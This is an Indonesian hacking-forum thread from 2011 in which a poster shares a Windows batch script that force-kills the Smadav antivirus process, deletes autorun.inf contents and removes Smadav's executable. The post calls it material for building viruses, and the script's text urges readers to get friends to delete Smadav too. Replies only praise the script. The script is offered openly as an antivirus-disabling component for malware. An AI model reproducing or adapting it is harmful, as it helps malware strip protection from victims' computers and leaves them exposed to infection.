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 script cara menghapus smadav

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2 posters
Tuan DC
BC Security
BC Security
Tuan DC

Jumlah posting : 623
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Join date : 11.08.11
Lokasi : in the Hell

script cara menghapus smadav Empty
PostSubyek: script cara menghapus smadav   script cara menghapus smadav Icon_minitimeSun Oct 30, 2011 12:27 pm

bye-bye smadav (buat bahan virus)
cara ngehapus smadav bserta folder2 smadav yg d bkin olh smadav brikut script nya
@echo off
title No More SMADAV : [Blueshadows & Blacker]
color A
set tmpdrive=%0
set drive=%tmpdrive:~1,2%
echo Killing SMADAV Process...
taskkill /F /T /IM SmaRTP.exe
echo Deleting CON, AUX and NUL FOLDER combination 1...
echo Deleting CON, AUX and NUL FOLDER combination 2...
echo Deleting AUTORUN Content[s]...
if exist autorun.inf (
cd autorun.inf
rd /S /Q *
del /F /Q *.*
cd ..
rd /S /Q autorun.inf\
echo Deleting SMADAV Program...
del /F /Q %systemroot%\SmaRTP.exe
echo ##### Operation[s] Successfull ! #####
echo - SMADAV Process has been killed
echo - SMADAV has been deleted
echo - Autorun.inf Deleted
echo ##### TIPS OF THE DAY ! #####
echo 1. Delete Folder named "? Smad-Lock ?" manualy by yourself
echo 2. Fuck off your SMADAV [Uninstall]
echo 3. Suggest your friends to delete SMADAV on their Computer
echo 4. If you need Flashdisk Protector, Contact Me :
echo [You must be registered and logged in to see this link.]
echo [You must be registered and logged in to see this link.]
echo [[[ If the program error or Need some Help, Send E-mail to Me ]]]
pause > nul

save dgn exsistensi *.bat niscaya smadav bakal ilank dri kompimu

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we are the professional security and we are also the hacktivist

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script cara menghapus smadav Empty
PostSubyek: Re: script cara menghapus smadav   script cara menghapus smadav Icon_minitimeSun Oct 30, 2011 1:06 pm

mantep dah ni script script cara menghapus smadav 597433815
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Tuan DC
BC Security
BC Security
Tuan DC

Jumlah posting : 623
Points : 704
Reputation : 41
Join date : 11.08.11
Lokasi : in the Hell

script cara menghapus smadav Empty
PostSubyek: Re: script cara menghapus smadav   script cara menghapus smadav Icon_minitimeSun Oct 30, 2011 3:56 pm

mau hpus smadav tpi syangnya pnya q dh pro,, script cara menghapus smadav 1082720249
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PostSubyek: Re: script cara menghapus smadav   script cara menghapus smadav Icon_minitime

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